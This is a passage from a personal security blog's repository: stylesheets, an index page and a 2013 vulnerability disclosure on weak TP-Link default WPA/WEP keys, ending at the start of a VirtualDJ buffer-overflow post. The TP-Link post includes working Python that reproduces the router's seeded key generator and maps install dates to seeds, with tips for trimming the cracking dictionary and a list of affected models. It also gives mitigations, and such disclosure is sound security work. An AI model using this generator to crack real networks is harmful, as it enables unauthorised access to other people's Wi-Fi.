738 |   word-wrap: normal;
739 | }
740 | 
741 | .markdown-body .commit-tease-sha {
742 |   color: #444d56;
743 |   display: inline-block;
744 |   font-family: SFMono-Regular,Consolas,Liberation Mono,Menlo,Courier,monospace;
745 |   font-size: 90%;
746 | }
747 | 
748 | .markdown-body .blob-wrapper {
749 |   border-bottom-left-radius: 3px;
750 |   border-bottom-right-radius: 3px;
751 |   overflow-x: auto;
752 |   overflow-y: hidden;
753 | }
754 | 
755 | .markdown-body .blob-wrapper-embedded {
756 |   max-height: 240px;
757 |   overflow-y: auto;
758 | }
759 | 
760 | .markdown-body .blob-num {
761 |   -moz-user-select: none;
762 |   -ms-user-select: none;
763 |   -webkit-user-select: none;
764 |   color: rgba(27,31,35,.3);
765 |   cursor: pointer;
766 |   font-family: SFMono-Regular,Consolas,Liberation Mono,Menlo,Courier,monospace;
767 |   font-size: 12px;
768 |   line-height: 20px;
769 |   min-width: 50px;
770 |   padding-left: 10px;
771 |   padding-right: 10px;
772 |   text-align: right;
773 |   user-select: none;
774 |   vertical-align: top;
775 |   white-space: nowrap;
776 |   width: 1%;
777 | }
778 | 
779 | .markdown-body .blob-num:hover {
780 |   color: rgba(27,31,35,.6);
781 | }
782 | 
783 | .markdown-body .blob-num:before {
784 |   content: attr(data-line-number);
785 | }
786 | 
787 | .markdown-body .blob-code {
788 |   line-height: 20px;
789 |   padding-left: 10px;
790 |   padding-right: 10px;
791 |   position: relative;
792 |   vertical-align: top;
793 | }
794 | 
795 | .markdown-body .blob-code-inner {
796 |   color: #24292e;
797 |   font-family: SFMono-Regular,Consolas,Liberation Mono,Menlo,Courier,monospace;
798 |   font-size: 12px;
799 |   overflow: visible;
800 |   white-space: pre;
801 |   word-wrap: normal;
802 | }
803 | 
804 | .markdown-body .pl-token.active,
805 | .markdown-body .pl-token:hover {
806 |   background: #ffea7f;
807 |   cursor: pointer;
808 | }
809 | 
810 | .markdown-body kbd {
811 |   background-color: #fafbfc;
812 |   border: 1px solid #d1d5da;
813 |   border-bottom-color: #c6cbd1;
814 |   border-radius: 3px;
815 |   box-shadow: inset 0 -1px 0 #c6cbd1;
816 |   color: #444d56;
817 |   display: inline-block;
818 |   font: 11px SFMono-Regular,Consolas,Liberation Mono,Menlo,Courier,monospace;
819 |   line-height: 10px;
820 |   padding: 3px 5px;
821 |   vertical-align: middle;
822 | }
823 | 
824 | .markdown-body :checked+.radio-label {
825 |   border-color: #0366d6;
826 |   position: relative;
827 |   z-index: 1;
828 | }
829 | 
830 | .markdown-body .tab-size[data-tab-size="1"] {
831 |   -moz-tab-size: 1;
832 |   tab-size: 1;
833 | }
834 | 
835 | .markdown-body .tab-size[data-tab-size="2"] {
836 |   -moz-tab-size: 2;
837 |   tab-size: 2;
838 | }
839 | 
840 | .markdown-body .tab-size[data-tab-size="3"] {
841 |   -moz-tab-size: 3;
842 |   tab-size: 3;
843 | }
844 | 
845 | .markdown-body .tab-size[data-tab-size="4"] {
846 |   -moz-tab-size: 4;
847 |   tab-size: 4;
848 | }
849 | 
850 | .markdown-body .tab-size[data-tab-size="5"] {
851 |   -moz-tab-size: 5;
852 |   tab-size: 5;
853 | }
854 | 
855 | .markdown-body .tab-size[data-tab-size="6"] {
856 |   -moz-tab-size: 6;
857 |   tab-size: 6;
858 | }
859 | 
860 | .markdown-body .tab-size[data-tab-size="7"] {
861 |   -moz-tab-size: 7;
862 |   tab-size: 7;
863 | }
864 | 
865 | .markdown-body .tab-size[data-tab-size="8"] {
866 |   -moz-tab-size: 8;
867 |   tab-size: 8;
868 | }
869 | 
870 | .markdown-body .tab-size[data-tab-size="9"] {
871 |   -moz-tab-size: 9;
872 |   tab-size: 9;
873 | }
874 | 
875 | .markdown-body .tab-size[data-tab-size="10"] {
876 |   -moz-tab-size: 10;
877 |   tab-size: 10;
878 | }
879 | 
880 | .markdown-body .tab-size[data-tab-size="11"] {
881 |   -moz-tab-size: 11;
882 |   tab-size: 11;
883 | }
884 | 
885 | .markdown-body .tab-size[data-tab-size="12"] {
886 |   -moz-tab-size: 12;
887 |   tab-size: 12;
888 | }
889 | 
890 | .markdown-body .task-list-item {
891 |   list-style-type: none;
892 | }
893 | 
894 | .markdown-body .task-list-item+.task-list-item {
895 |   margin-top: 3px;
896 | }
897 | 
898 | .markdown-body .task-list-item input {
899 |   margin: 0 .2em .25em -1.6em;
900 |   vertical-align: middle;
901 | }
902 | 
903 | .markdown-body hr {
904 |   border-bottom-color: #eee;
905 | }
906 | 
907 | .markdown-body .pl-0 {
908 |   padding-left: 0!important;
909 | }
910 | 
911 | .markdown-body .pl-1 {
912 |   padding-left: 4px!important;
913 | }
914 | 
915 | .markdown-body .pl-2 {
916 |   padding-left: 8px!important;
917 | }
918 | 
919 | .markdown-body .pl-3 {
920 |   padding-left: 16px!important;
921 | }
922 | 
923 | .markdown-body .pl-4 {
924 |   padding-left: 24px!important;
925 | }
926 | 
927 | .markdown-body .pl-5 {
928 |   padding-left: 32px!important;
929 | }
930 | 
931 | .markdown-body .pl-6 {
932 |   padding-left: 40px!important;
933 | }
934 | 
935 | .markdown-body .pl-7 {
936 |   padding-left: 48px!important;
937 | }
938 | 
939 | .markdown-body .pl-8 {
940 |   padding-left: 64px!important;
941 | }
942 | 
943 | .markdown-body .pl-9 {
944 |   padding-left: 80px!important;
945 | }
946 | 
947 | .markdown-body .pl-10 {
948 |   padding-left: 96px!important;
949 | }
950 | 
951 | .markdown-body .pl-11 {
952 |   padding-left: 112px!important;
953 | }
954 | 
955 | .markdown-body .pl-12 {
956 |   padding-left: 128px!important;
957 | }
958 | 


--------------------------------------------------------------------------------
/index.html:
--------------------------------------------------------------------------------
 1 | <!-- This file has been auto-generated! -->
 2 | <!DOCTYPE html>
 3 | <html>
 4 |     <head>
 5 |         <meta charset="utf-8">
 6 |         <meta name="viewport" content="width=device-width, initial-scale=1">
 7 |         <title>Blog</title>
 8 |         <!-- Style -->
 9 |         <link rel="stylesheet" href="css/code.css">
10 |         <link rel="stylesheet" href="css/markdown.css">
11 |         <style>
12 |             body {
13 |                 box-sizing: border-box;
14 |                 min-width: 200px;
15 |                 max-width: 980px;
16 |                 margin: 0 auto;
17 |                 padding: 45px;
18 |             }
19 | 
20 |             header {
21 |                 position: relative;
22 |             }
23 |             header > .links {
24 |                 position: absolute;
25 |                 right: 0;
26 |             }
27 | 
28 |             footer {
29 |                 text-align: center;
30 |             }
31 |         
32 |             @media (max-width: 767px) {
33 |                 body {
34 |                     padding: 15px;
35 |                 }
36 |             }
37 |         </style>
38 |     </head>
39 |     <body class="markdown-body">
40 |         <header>
41 |             <div class="links">
42 |                 <span>
43 |                     <a href="https://twitter.com/AlexAltea">Twitter</a> |
44 |                     <a href="https://github.com/AlexAltea">Github</a> |
45 |                     <a href="mailto:alexandro@phi.nz">Email</a>
46 |                 </span>
47 |             </div>
48 |             <h1>Blog</h1>
49 |         </header>
50 |         <article>
51 |             <table><thead><td><b>Date</b></td><td><b>Article</b></td></thead><tr><td>2019-02-16</td><td><a href="posts\2019-02-16-cell-miner-alu\">PS3/Cell Cryptomining: Wide arithmetic on SPUs</a></td></tr><tr><td>2018-04-18</td><td><a href="posts\2018-04-18-lle-vs-hle\">LLE vs HLE and their tradeoffs</a></td></tr><tr><td>2017-06-19</td><td><a href="posts\2017-07-19-googlectf-2017-moon\">GoogleCTF 2017 Reversing/Moon writeup</a></td></tr><tr><td>2016-10-12</td><td><a href="posts\2016-10-12-xchg-rax-rax-solutions\">Solutions of xchg rax,rax</a></td></tr><tr><td>2016-09-07</td><td><a href="posts\2016-09-14-jit-compiled-maps\">Fast lookups in JIT-compiled maps</a></td></tr><tr><td>2016-08-22</td><td><a href="posts\2016-08-22-observations\">Observations</a></td></tr><tr><td>2016-03-16</td><td><a href="posts\2016-03-16-ps3-gpu-exploit\">PS3 GPU Full VRAM/IO access exploit</a></td></tr><tr><td>2013-04-20</td><td><a href="posts\2013-04-20-virtualdj-74-buffer-overflow\">VirtualDJ Pro/Home 7.4: Buffer Overflow</a></td></tr><tr><td>2013-03-31</td><td><a href="posts\2013-03-31-wpa2-vulnerability-linksys-dlink\">WPA2 Key Generation Vulnerability: Linksys / D-Link</a></td></tr><tr><td>2013-03-30</td><td><a href="posts\2013-03-30-virtualdj-73-buffer-overflow\">VirtualDJ Pro/Home 7.3: Buffer Overflow</a></td></tr><tr><td>2013-03-08</td><td><a href="posts\2013-03-08-wpa2-vulnerability-tplink\">WPA2 Key Generation Vulnerability: TP-Link</a></td></tr></table>
52 |         </article>
53 |         <hr>
54 |         <footer>
55 |             <p>
56 |                 Questions? Comments? <a href="https://github.com/AlexAltea/blog/issues">Open an issue!</a>
57 |             </p>
58 |             <p><a href="mailto:alexandro@phi.nz">alexandro@phi.nz</a></p>
59 |         </footer>
60 |     </body>
61 | </html>
62 | 


--------------------------------------------------------------------------------
/posts/2013-03-08-wpa2-vulnerability-tplink/_main.md:
--------------------------------------------------------------------------------
  1 | ---
  2 | layout: post
  3 | date: 2013-03-08
  4 | title: WPA2 Key Generation Vulnerability: TP-Link
  5 | author: Alexandro Sanchez
  6 | ---
  7 | 
  8 | These days I have been playing with my new WLAN router, a [TP-Link TD-W8970](http://www.tp-link.com/en/products/?categoryid=203), and I have found a particularly interesting issue that affects other TP-Link routers as well. These routers can be recognized by the ESSID key `TP-LINK_XXXXXX`. Their default key for WPA/WPA2 and WEP is 10 and 13 characters in length respectively, apparently in range `[0-9A-Z]` and randomly generated by the [EasySetupAssistant](http://www.tp-link.com/mx/support/download/?model=TD-W8970&amp;version=V1#tbl_b).
  9 | 
 10 | Based on this, the corresponding handshake of such a WPA/WPA2 key, bruteforced with typical GPU speeds of 20000 keys / second, would require 36^10 / 20000 seconds = 182807922003.1488 seconds = 5796.8011 years to be cracked. However, by disassembling the setup assistant, I realized this key is generated from a 32-bit seed by following a [linear congruential generator](http://en.wikipedia.org/wiki/Linear_congruential_generator) reducing our key set from 36^10 keys to 2^32 keys. The reversed generator is:
 11 | 
 12 | ```python
 13 | chars = "2345678923456789ABCDEFGHJKLMNPQRSTUVWXYZ"
 14 | def gen(seed, length): #length=10 in WPA/WPA2, length=13 in WEP 
 15 |     key = ""
 16 |     for i in range(length):
 17 |         seed = (seed * 0x343FD) + 0x269EC3
 18 |         key += chars[((seed >> 0x10) & 0x7FFF) % 0x28]
 19 |     return key
 20 | ```
 21 | 
 22 | Furthermore, note how the for any `length` and 32-bit integer seed `k` following condition holds: `gen(k, length) == gen(k + 0x80000000, length)`. This reduces the keys to check to 2^31. At the previously mentioned computing speed, this implies finding such a key in 231 / 20000 seconds = 1.24 days.
 23 | 
 24 | There is an additional issue affecting the seed generation that can help reducing the password dictionaries even more. These 32-bit seeds are not the result of a cryptographically secure [PRNG](https://en.wikipedia.org/wiki/Pseudorandom_number_generator). Instead they just represent a time difference, growing linearly at a rate of 1 every second as the system time passes. In Windows, the system time is obtained via `GetSystemTimeAsFileTime` from `Kernel32.dll`. The corresponding code to generate a seed at a given moment is:
 25 | 
 26 | ```python
 27 | import datetime
 28 |  
 29 | def genSeed(currentTime):
 30 |     dt = currentTime - datetime.datetime(1601, 1, 1, 0, 0, 0)
 31 |     t = dt.days*864000000000 + dt.seconds*10000000 + dt.microseconds*10
 32 |  
 33 |     tA = (t / 2**32 + 0xFE624E21)
 34 |     tB = (t % 2**32 + 0x2AC18000) % (1 << 32)
 35 |  
 36 |     if tA >= (1 << 32):
 37 |         tA += 1
 38 |         tA %= (1 << 32)
 39 |  
 40 |     r = (tA % 0x989680) * (2**32)
 41 |     r = ((r + tB) / 0x989680) % (2**32)
 42 |     return r
 43 |  
 44 | print genSeed(datetime.datetime.utcnow())
 45 | ```
 46 | 
 47 | If we can estimate the time interval in which the router was installed, we can reduce the total seeds from 2^31 to the seeds that could be generated in that specific time interval. For instance, if we are confident that such a router was installed during 2012, we would only have to check the keys corresponding to seeds between `0x4EFFA3AD` y `0x50E22700`:
 48 | 
 49 | ```python
 50 | genSeed(datetime.datetime(2012, 1, 1, 0, 0, 0))  # 0x4EFFA3AD
 51 | genSeed(datetime.datetime(2013, 1, 1, 0, 0, 0))  # 0x50E22700
 52 | ```
 53 | 
 54 | At the previously mentioned speed, we could potentially crack the password in a worst-case time of (0x50E22700 - 0x4EFFA3AD) / 20000 seconds = 26.35 minutes.
 55 | 
 56 | Since guessing the time in which the setup assistant configured the router can help us reduce the time required to find the key, we could improve our dictionary in the following ways:
 57 | 
 58 | * Detecting the WLAN router series and model, if possible, and compare it with a database of release dates in order to discard any seed corresponding to dates in which the router was not on the market.
 59 | * Discard any seeds corresponding to *strange* hours. For instance, it is pretty unlikely someone sets up their router at 2 AM and 6 AM.
 60 | 
 61 | ## Affected routers
 62 | 
 63 | I have verified all setup assistants distributed with TP-Link routers and all *TL-WA*, *TL-WR*, *TL-WDR* series and *TD-WXXXX*, *TD-VGXXXX* models are affected. In about 10% of these routers I wasn't able to download the *EasySetupAssistant* through the link TP-Link provided, but I am confident enough that the results of same routers of the series can be extrapolated to them.
 64 | 
 65 | The complete list of affected routers is:
 66 | 
 67 | * TL-W8151N (V1, V3)
 68 | * TL-WA730RE (V1, V2*)
 69 | * TL-WA830RE (V1, V2*)
 70 | * TL-WDR3500
 71 | * TL-WDR3600
 72 | * TL-WDR4300
 73 | * TL-WR720N
 74 | * TL-WR740N (V1, V2, V3, V4)
 75 | * TL-WR741ND (V1, V2, V3*, V4)
 76 | * TL-WR841N (V1*, V5, V7, V8)
 77 | * TL-WR841ND (V3, V5, V7, V8*)
 78 | * TL-WR842ND
 79 | * TL-WR940N (V1, V2)
 80 | * TL-WR941ND (V2, V3, V4, V5)
 81 | * TL-WR1043N
 82 | * TL-WR1043ND
 83 | * TD-VG3511 (V1*)
 84 | * TD-VG3631
 85 | * TD-W8901N
 86 | * TD-W8950ND
 87 | * TD-W8951NB (V3*, V4, V5)
 88 | * TD-W8951ND (V1, V3, V4, V5)
 89 | * TD-W8960N (V1, V3, V4)
 90 | * TD-W8961NB (V1, V2, V3*)
 91 | * TD-W8961ND
 92 | * TD-W8968
 93 | * TD-W8970
 94 | 
 95 | ## Resources
 96 | 
 97 | * __TPLink-CheckKeys__: Check if your key is vulnarable to this attack, i.e., find whether your key is in the set of keys generated by all possible seeds. Download: http://www.mediafire.com/?oyrnt45sljlxa5a.
 98 | 
 99 | * __TPLink-GenSeeds__: This tool calculates the seed interval from the given time interval in which the router might have been installed. Download: http://www.mediafire.com/download.php?44l9629qq1dx2l8.
100 | 
101 | * __TPLink-GenKeys__: Choose key type, the seed range which can be calculated with the previous tool. Information about dictionary to be generated will be given, accept to generate it in `./output.txt`. Download: http://www.mediafire.com/download.php?28z2fvdgpf22s68.
102 | 
103 | ## Solutions
104 | 
105 | * Do not use seeds at all. Feed the results of a cryptographically secure PRNG such as `/dev/random` or `/dev/urandom` in Unix-like sytems as indices of the character array modulo its length. This is for instance what the Linksys E4200 WLAN routers do, the indices of the key character array are provided by `CryptGenRandom` in `Advapi32.dll`.
106 | * If for some reason you want to use seeds for generating keys:
107 |   * Make them bigger than 32-bit. Just 2^32 keys are easy to check.
108 |   * Obtain them from a cryptographically secure PRNG.
109 |   * If you still want to obtain them from the system time, use low granularity time intervals (e.g. elapsed time in nanoseconds rather than seconds) to minimize the number of bits an attacker can guess. 
110 | 


--------------------------------------------------------------------------------
/posts/2013-03-08-wpa2-vulnerability-tplink/index.html:
--------------------------------------------------------------------------------
  1 | <!-- This file has been auto-generated! -->
  2 | <!DOCTYPE html>
  3 | <html>
  4 |     <head>
  5 |         <meta charset="utf-8">
  6 |         <meta name="viewport" content="width=device-width, initial-scale=1">
  7 |         <title>WPA2 Key Generation Vulnerability: TP-Link</title>
  8 |         <!-- Style -->
  9 |         <link rel="stylesheet" href="../../css/code.css">
 10 |         <link rel="stylesheet" href="../../css/markdown.css">
 11 |         <style>
 12 |             body {
 13 |                 box-sizing: border-box;
 14 |                 min-width: 200px;
 15 |                 max-width: 980px;
 16 |                 margin: 0 auto;
 17 |                 padding: 45px;
 18 |             }
 19 | 
 20 |             header {
 21 |                 position: relative;
 22 |             }
 23 |             header > .links {
 24 |                 position: absolute;
 25 |                 right: 0;
 26 |             }
 27 | 
 28 |             .post-key {
 29 |                 background-color: hsl(45, 67%, 80%);
 30 |                 border-radius: 5px 0px 0px 5px;
 31 |                 padding: 2px 6px 2px 8px;
 32 |                 margin: 0px;
 33 |             }
 34 |             .post-val {
 35 |                 background-color: hsl(45, 67%, 90%);
 36 |                 border-radius: 0px 5px 5px 0px;
 37 |                 padding: 2px 8px 2px 6px;
 38 |                 margin: 0px;
 39 |             }
 40 | 
 41 |             footer {
 42 |                 text-align: center;
 43 |             }
 44 |         
 45 |             @media (max-width: 767px) {
 46 |                 body {
 47 |                     padding: 15px;
 48 |                 }
 49 |             }
 50 |         </style>
 51 |     </head>
 52 |     <body class="markdown-body">
 53 |         <header>
 54 |             <div class="links">
 55 |                 <span>
 56 |                     <a href="https://twitter.com/AlexAltea">Twitter</a> |
 57 |                     <a href="https://github.com/AlexAltea">Github</a> |
 58 |                     <a href="mailto:alexandro@phi.nz">Email</a>
 59 |                 </span>
 60 |             </div>
 61 |             <span><a href="../../">&lt; Other articles</a></span>
 62 |         </header>
 63 |         <article>
 64 |             <h1>WPA2 Key Generation Vulnerability: TP-Link</h1>
 65 |             <p>
 66 |                 <span 
 67 |                     class="post-key">Author</span><span
 68 |                     class="post-val">Alexandro Sanchez</span>
 69 |                 <span
 70 |                     class="post-key">Date</span><span
 71 |                     class="post-val">2013-03-08</span>
 72 |             </p>
 73 |             <p>These days I have been playing with my new WLAN router, a <a href="http://www.tp-link.com/en/products/?categoryid=203">TP-Link TD-W8970</a>, and I have found a particularly interesting issue that affects other TP-Link routers as well. These routers can be recognized by the ESSID key <code>TP-LINK_XXXXXX</code>. Their default key for WPA/WPA2 and WEP is 10 and 13 characters in length respectively, apparently in range <code>[0-9A-Z]</code> and randomly generated by the <a href="http://www.tp-link.com/mx/support/download/?model=TD-W8970&amp;version=V1#tbl_b">EasySetupAssistant</a>.</p>
 74 | <p>Based on this, the corresponding handshake of such a WPA/WPA2 key, bruteforced with typical GPU speeds of 20000 keys / second, would require 36^10 / 20000 seconds = 182807922003.1488 seconds = 5796.8011 years to be cracked. However, by disassembling the setup assistant, I realized this key is generated from a 32-bit seed by following a <a href="http://en.wikipedia.org/wiki/Linear_congruential_generator">linear congruential generator</a> reducing our key set from 36^10 keys to 2^32 keys. The reversed generator is:</p>
 75 | <div class="codehilite"><pre><span></span><span class="n">chars</span> <span class="o">=</span> <span class="s2">&quot;2345678923456789ABCDEFGHJKLMNPQRSTUVWXYZ&quot;</span>
 76 | <span class="k">def</span> <span class="nf">gen</span><span class="p">(</span><span class="n">seed</span><span class="p">,</span> <span class="n">length</span><span class="p">):</span> <span class="c1">#length=10 in WPA/WPA2, length=13 in WEP </span>
 77 |     <span class="n">key</span> <span class="o">=</span> <span class="s2">&quot;&quot;</span>
 78 |     <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">length</span><span class="p">):</span>
 79 |         <span class="n">seed</span> <span class="o">=</span> <span class="p">(</span><span class="n">seed</span> <span class="o">*</span> <span class="mh">0x343FD</span><span class="p">)</span> <span class="o">+</span> <span class="mh">0x269EC3</span>
 80 |         <span class="n">key</span> <span class="o">+=</span> <span class="n">chars</span><span class="p">[((</span><span class="n">seed</span> <span class="o">&gt;&gt;</span> <span class="mh">0x10</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mh">0x7FFF</span><span class="p">)</span> <span class="o">%</span> <span class="mh">0x28</span><span class="p">]</span>
 81 |     <span class="k">return</span> <span class="n">key</span>
 82 | </pre></div>
 83 | 
 84 | 
 85 | <p>Furthermore, note how the for any <code>length</code> and 32-bit integer seed <code>k</code> following condition holds: <code>gen(k, length) == gen(k + 0x80000000, length)</code>. This reduces the keys to check to 2^31. At the previously mentioned computing speed, this implies finding such a key in 231 / 20000 seconds = 1.24 days.</p>
 86 | <p>There is an additional issue affecting the seed generation that can help reducing the password dictionaries even more. These 32-bit seeds are not the result of a cryptographically secure <a href="https://en.wikipedia.org/wiki/Pseudorandom_number_generator">PRNG</a>. Instead they just represent a time difference, growing linearly at a rate of 1 every second as the system time passes. In Windows, the system time is obtained via <code>GetSystemTimeAsFileTime</code> from <code>Kernel32.dll</code>. The corresponding code to generate a seed at a given moment is:</p>
 87 | <div class="codehilite"><pre><span></span><span class="kn">import</span> <span class="nn">datetime</span>
 88 | 
 89 | <span class="k">def</span> <span class="nf">genSeed</span><span class="p">(</span><span class="n">currentTime</span><span class="p">):</span>
 90 |     <span class="n">dt</span> <span class="o">=</span> <span class="n">currentTime</span> <span class="o">-</span> <span class="n">datetime</span><span class="o">.</span><span class="n">datetime</span><span class="p">(</span><span class="mi">1601</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span>
 91 |     <span class="n">t</span> <span class="o">=</span> <span class="n">dt</span><span class="o">.</span><span class="n">days</span><span class="o">*</span><span class="mi">864000000000</span> <span class="o">+</span> <span class="n">dt</span><span class="o">.</span><span class="n">seconds</span><span class="o">*</span><span class="mi">10000000</span> <span class="o">+</span> <span class="n">dt</span><span class="o">.</span><span class="n">microseconds</span><span class="o">*</span><span class="mi">10</span>
 92 | 
 93 |     <span class="n">tA</span> <span class="o">=</span> <span class="p">(</span><span class="n">t</span> <span class="o">/</span> <span class="mi">2</span><span class="o">**</span><span class="mi">32</span> <span class="o">+</span> <span class="mh">0xFE624E21</span><span class="p">)</span>
 94 |     <span class="n">tB</span> <span class="o">=</span> <span class="p">(</span><span class="n">t</span> <span class="o">%</span> <span class="mi">2</span><span class="o">**</span><span class="mi">32</span> <span class="o">+</span> <span class="mh">0x2AC18000</span><span class="p">)</span> <span class="o">%</span> <span class="p">(</span><span class="mi">1</span> <span class="o">&lt;&lt;</span> <span class="mi">32</span><span class="p">)</span>
 95 | 
 96 |     <span class="k">if</span> <span class="n">tA</span> <span class="o">&gt;=</span> <span class="p">(</span><span class="mi">1</span> <span class="o">&lt;&lt;</span> <span class="mi">32</span><span class="p">):</span>
 97 |         <span class="n">tA</span> <span class="o">+=</span> <span class="mi">1</span>
 98 |         <span class="n">tA</span> <span class="o">%=</span> <span class="p">(</span><span class="mi">1</span> <span class="o">&lt;&lt;</span> <span class="mi">32</span><span class="p">)</span>
 99 | 
100 |     <span class="n">r</span> <span class="o">=</span> <span class="p">(</span><span class="n">tA</span> <span class="o">%</span> <span class="mh">0x989680</span><span class="p">)</span> <span class="o">*</span> <span class="p">(</span><span class="mi">2</span><span class="o">**</span><span class="mi">32</span><span class="p">)</span>
101 |     <span class="n">r</span> <span class="o">=</span> <span class="p">((</span><span class="n">r</span> <span class="o">+</span> <span class="n">tB</span><span class="p">)</span> <span class="o">/</span> <span class="mh">0x989680</span><span class="p">)</span> <span class="o">%</span> <span class="p">(</span><span class="mi">2</span><span class="o">**</span><span class="mi">32</span><span class="p">)</span>
102 |     <span class="k">return</span> <span class="n">r</span>
103 | 
104 | <span class="k">print</span> <span class="n">genSeed</span><span class="p">(</span><span class="n">datetime</span><span class="o">.</span><span class="n">datetime</span><span class="o">.</span><span class="n">utcnow</span><span class="p">())</span>
105 | </pre></div>
106 | 
107 | 
108 | <p>If we can estimate the time interval in which the router was installed, we can reduce the total seeds from 2^31 to the seeds that could be generated in that specific time interval. For instance, if we are confident that such a router was installed during 2012, we would only have to check the keys corresponding to seeds between <code>0x4EFFA3AD</code> y <code>0x50E22700</code>:</p>
109 | <div class="codehilite"><pre><span></span><span class="n">genSeed</span><span class="p">(</span><span class="n">datetime</span><span class="o">.</span><span class="n">datetime</span><span class="p">(</span><span class="mi">2012</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">))</span>  <span class="c1"># 0x4EFFA3AD</span>
110 | <span class="n">genSeed</span><span class="p">(</span><span class="n">datetime</span><span class="o">.</span><span class="n">datetime</span><span class="p">(</span><span class="mi">2013</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">))</span>  <span class="c1"># 0x50E22700</span>
111 | </pre></div>
112 | 
113 | 
114 | <p>At the previously mentioned speed, we could potentially crack the password in a worst-case time of (0x50E22700 - 0x4EFFA3AD) / 20000 seconds = 26.35 minutes.</p>
115 | <p>Since guessing the time in which the setup assistant configured the router can help us reduce the time required to find the key, we could improve our dictionary in the following ways:</p>
116 | <ul>
117 | <li>Detecting the WLAN router series and model, if possible, and compare it with a database of release dates in order to discard any seed corresponding to dates in which the router was not on the market.</li>
118 | <li>Discard any seeds corresponding to <em>strange</em> hours. For instance, it is pretty unlikely someone sets up their router at 2 AM and 6 AM.</li>
119 | </ul>
120 | <h2 id="affected-routers">Affected routers</h2>
121 | <p>I have verified all setup assistants distributed with TP-Link routers and all <em>TL-WA</em>, <em>TL-WR</em>, <em>TL-WDR</em> series and <em>TD-WXXXX</em>, <em>TD-VGXXXX</em> models are affected. In about 10% of these routers I wasn't able to download the <em>EasySetupAssistant</em> through the link TP-Link provided, but I am confident enough that the results of same routers of the series can be extrapolated to them.</p>
122 | <p>The complete list of affected routers is:</p>
123 | <ul>
124 | <li>TL-W8151N (V1, V3)</li>
125 | <li>TL-WA730RE (V1, V2*)</li>
126 | <li>TL-WA830RE (V1, V2*)</li>
127 | <li>TL-WDR3500</li>
128 | <li>TL-WDR3600</li>
129 | <li>TL-WDR4300</li>
130 | <li>TL-WR720N</li>
131 | <li>TL-WR740N (V1, V2, V3, V4)</li>
132 | <li>TL-WR741ND (V1, V2, V3*, V4)</li>
133 | <li>TL-WR841N (V1*, V5, V7, V8)</li>
134 | <li>TL-WR841ND (V3, V5, V7, V8*)</li>
135 | <li>TL-WR842ND</li>
136 | <li>TL-WR940N (V1, V2)</li>
137 | <li>TL-WR941ND (V2, V3, V4, V5)</li>
138 | <li>TL-WR1043N</li>
139 | <li>TL-WR1043ND</li>
140 | <li>TD-VG3511 (V1*)</li>
141 | <li>TD-VG3631</li>
142 | <li>TD-W8901N</li>
143 | <li>TD-W8950ND</li>
144 | <li>TD-W8951NB (V3*, V4, V5)</li>
145 | <li>TD-W8951ND (V1, V3, V4, V5)</li>
146 | <li>TD-W8960N (V1, V3, V4)</li>
147 | <li>TD-W8961NB (V1, V2, V3*)</li>
148 | <li>TD-W8961ND</li>
149 | <li>TD-W8968</li>
150 | <li>TD-W8970</li>
151 | </ul>
152 | <h2 id="resources">Resources</h2>
153 | <ul>
154 | <li>
155 | <p><strong>TPLink-CheckKeys</strong>: Check if your key is vulnarable to this attack, i.e., find whether your key is in the set of keys generated by all possible seeds. Download: http://www.mediafire.com/?oyrnt45sljlxa5a.</p>
156 | </li>
157 | <li>
158 | <p><strong>TPLink-GenSeeds</strong>: This tool calculates the seed interval from the given time interval in which the router might have been installed. Download: http://www.mediafire.com/download.php?44l9629qq1dx2l8.</p>
159 | </li>
160 | <li>
161 | <p><strong>TPLink-GenKeys</strong>: Choose key type, the seed range which can be calculated with the previous tool. Information about dictionary to be generated will be given, accept to generate it in <code>./output.txt</code>. Download: http://www.mediafire.com/download.php?28z2fvdgpf22s68.</p>
162 | </li>
163 | </ul>
164 | <h2 id="solutions">Solutions</h2>
165 | <ul>
166 | <li>Do not use seeds at all. Feed the results of a cryptographically secure PRNG such as <code>/dev/random</code> or <code>/dev/urandom</code> in Unix-like sytems as indices of the character array modulo its length. This is for instance what the Linksys E4200 WLAN routers do, the indices of the key character array are provided by <code>CryptGenRandom</code> in <code>Advapi32.dll</code>.</li>
167 | <li>If for some reason you want to use seeds for generating keys:</li>
168 | <li>Make them bigger than 32-bit. Just 2^32 keys are easy to check.</li>
169 | <li>Obtain them from a cryptographically secure PRNG.</li>
170 | <li>If you still want to obtain them from the system time, use low granularity time intervals (e.g. elapsed time in nanoseconds rather than seconds) to minimize the number of bits an attacker can guess. </li>
171 | </ul>
172 |         </article>
173 |         <hr>
174 |         <footer>
175 |             <p>
176 |                 Questions? Comments? <a href="https://github.com/AlexAltea/blog/issues">Open an issue!</a>
177 |             </p>
178 |             <p><a href="mailto:alexandro@phi.nz">alexandro@phi.nz</a></p>
179 |         </footer>
180 |     </body>
181 | </html>
182 | 


--------------------------------------------------------------------------------
/posts/2013-03-30-virtualdj-73-buffer-overflow/_main.md:
--------------------------------------------------------------------------------
  1 | ---
  2 | layout: post
  3 | date: 2013-03-30
  4 | title: VirtualDJ Pro/Home 7.3: Buffer Overflow
  5 | author: Alexandro Sanchez
  6 | ---
  7 | 
  8 | I have found a buffer overflow vulnerability in [VirtualDJ Pro 7.3 and VirtualDJ Home 7.3](http://www.virtualdj.com/) and possibly previous versions of this software. When the user enters a folder, VirtualDJ tries to retrieve all information from the ID3 tags of MP3 files inside such as _Title_, _Album_, and _Artist_ and stores it in a buffer. After that, a second buffer of length 4096 is allocated in the stack and only the characters `[A-Z]` from the first buffer will be copied to it. According to the ID3 v2.x standard, these tags can have a length greater than 4096; therefore it is possible to produce a buffer overflow in this second buffer. At the time when the buffer overflow happens and the program reaches the `retn` instruction, the `edi` register points to the first buffer.
  9 | 
